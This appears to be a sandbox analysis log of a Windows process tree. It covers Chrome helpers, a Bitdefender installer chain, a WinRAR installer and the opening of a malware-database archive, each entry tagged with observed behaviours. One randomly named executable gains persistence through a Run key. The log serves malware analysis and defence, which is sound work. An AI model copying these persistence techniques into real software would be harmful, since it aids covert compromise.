C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x238,0x23c,0x240,0x214,0x1e8,0x7ff7ed57a890,0x7ff7ed57a8a0,0x7ff7ed57a8b03⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5164 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5156 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5328 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5276 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5576 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5248 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3076 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5524 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5484 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6036 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5988 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5648 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1592 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4060 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5792 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3208 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3884 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6224 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3704 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5504 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6616 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5268 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5528 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3232 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=212 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6080 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6012 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3992 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=2172 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3300 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6876 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6924 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7008 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3460 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6956 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5876 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5916 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5908 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2916 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6436 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=7136 /prefetch:82⤵
-
C:\Users\Admin\Downloads\bitdefender_tsecurity.exe"C:\Users\Admin\Downloads\bitdefender_tsecurity.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\agent_launcher.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\agent_launcher.exe"3⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\bddeploy.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\bddeploy.exe"4⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\packages\setuppackage.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\packages\setuppackage.exe"5⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\packages\installer.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\packages\installer.exe"5⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Bitdefender Agent\ProductAgentService.exe"C:\Program Files\Bitdefender Agent\ProductAgentService.exe" protect6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files\Bitdefender Agent\ProductAgentService.exe"C:\Program Files\Bitdefender Agent\ProductAgentService.exe" install6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files\Bitdefender Agent\ProductAgentService.exe"C:\Program Files\Bitdefender Agent\ProductAgentService.exe" enable6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files\Bitdefender Agent\ProductAgentService.exe"C:\Program Files\Bitdefender Agent\ProductAgentService.exe" start "C:\Users\Admin\Downloads\bitdefender_tsecurity.exe"6⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6896 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6932 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5668 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6864 /prefetch:22⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5540 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3364 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6468 /prefetch:82⤵
-
C:\Users\Admin\Downloads\winrar-x64-611.exe"C:\Users\Admin\Downloads\winrar-x64-611.exe"2⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\WinRAR\uninstall.exe"C:\Program Files\WinRAR\uninstall.exe" /setup3⤵
- Modifies system executable filetype association
- Executes dropped EXE
- Registers COM server for autorun
- Modifies registry class
-
C:\Users\Admin\vmkEcMcU\xMEwQkYA.exe"C:\Users\Admin\vmkEcMcU\xMEwQkYA.exe"3⤵
- Executes dropped EXE
- Adds Run key to start application
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6448 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4044 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3232 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5216 /prefetch:12⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6528 /prefetch:82⤵
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1652,2414514605781397571,11863678075571985792,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2868 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Program Files\WinRAR\WinRAR.exe"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\Admin\Downloads\MalwareDatabase-master.zip"2⤵
- Executes dropped EXE
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Program Files\Bitdefender Agent\redline\bdredline.exe"C:\Program Files\Bitdefender Agent\redline\bdredline.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files\Bitdefender Agent\ProductAgentService.exe"C:\Program Files\Bitdefender Agent\ProductAgentService.exe"1⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Bitdefender Agent\26.0.1.231\DiscoverySrv.exe"C:\Program Files\Bitdefender Agent\26.0.1.231\DiscoverySrv.exe" install2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Modifies system certificate store
-
C:\Windows\SysWOW64\regsvr32.exeregsvr32 /s "C:\Program Files\Bitdefender Agent\26.0.1.231\DiscoveryComp.dll"3⤵
- Loads dropped DLL
- Modifies registry class
-
C:\Program Files\Bitdefender Agent\26.0.1.231\DiscoverySrv.exe"C:\Program Files\Bitdefender Agent\26.0.1.231\DiscoverySrv.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
-
C:\Program Files\Bitdefender Agent\ProductAgentService.exe"ProductAgentService.exe" login_silent2⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Program Files\Bitdefender Agent\26.0.1.231\ProductAgentUI.exe"C:\Program Files\Bitdefender Agent\26.0.1.231\ProductAgentUI.exe" show=progress event_retry=Global\7295237F-E98C-4C46-A4A4-07F0D66278C22⤵
- Executes dropped EXE
- Loads dropped DLL
- Modifies data under HKEY_USERS
-
C:\Program Files\Bitdefender Agent\26.0.1.231\WatchDog.exe"C:\Program Files\Bitdefender Agent\26.0.1.231\WatchDog.exe" install2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
-
C:\Windows\TEMP\bd_DF20.tmp\wekDF21.tmp"C:\Windows\TEMP\bd_DF20.tmp\wekDF21.tmp" /source:web /attach2⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\RarSFX0\installer.exe"C:\Users\Admin\AppData\Local\Temp\RarSFX0\installer.exe" /kitArchive3⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\Installer.exe"C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\Installer.exe" /attach /source:web /setup-folder:"CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95"4⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Uses Session Manager for persistence
- Checks BIOS information in registry
- Drops file in Program Files directory
- Drops file in Windows directory
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Program Files\Bitdefender Agent\ProductAgentUI.exe"C:\Program Files\Bitdefender Agent\ProductAgentUI.exe" attach=5248885⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\pnputil.exe"C:\Windows\system32\pnputil.exe" -a "C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\trufos.inf"5⤵
- Drops file in Windows directory
-
C:\Windows\system32\pnputil.exe"C:\Windows\system32\pnputil.exe" -a "C:\Program Files\Common Files\Bitdefender\SetupInformation\CL-26-A67E3030-1EB1-4B79-9744-2D3DDEAE4C95\vlflt.inf"5⤵
- Drops file in Windows directory
-
C:\Windows\system32\fltmc.exe"C:\Windows\system32\fltmc.exe" load vlflt5⤵
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" control bdauxsrv 1285⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" control vsserv 1285⤵
- Launches sc.exe
-
C:\Windows\system32\fltmc.exe"C:\Windows\system32\fltmc.exe" unload vlflt5⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\pnputil.exe"C:\Windows\system32\pnputil.exe" -d oem3.inf5⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Windows\system32\pnputil.exe"C:\Windows\system32\pnputil.exe" -d oem2.inf5⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" control bdprotsrv 1285⤵
- Launches sc.exe
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s upnphost1⤵
- Drops file in Windows directory
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
-
C:\Windows\System32\rundll32.exe"C:\Windows\System32\rundll32.exe" shell32.dll,Control_RunDLL desk.cpl1⤵
- Checks computer location settings
-
C:\Windows\explorer.exe"C:\Windows\explorer.exe" ms-settings:display2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s DisplayEnhancementService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s DeviceInstall1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
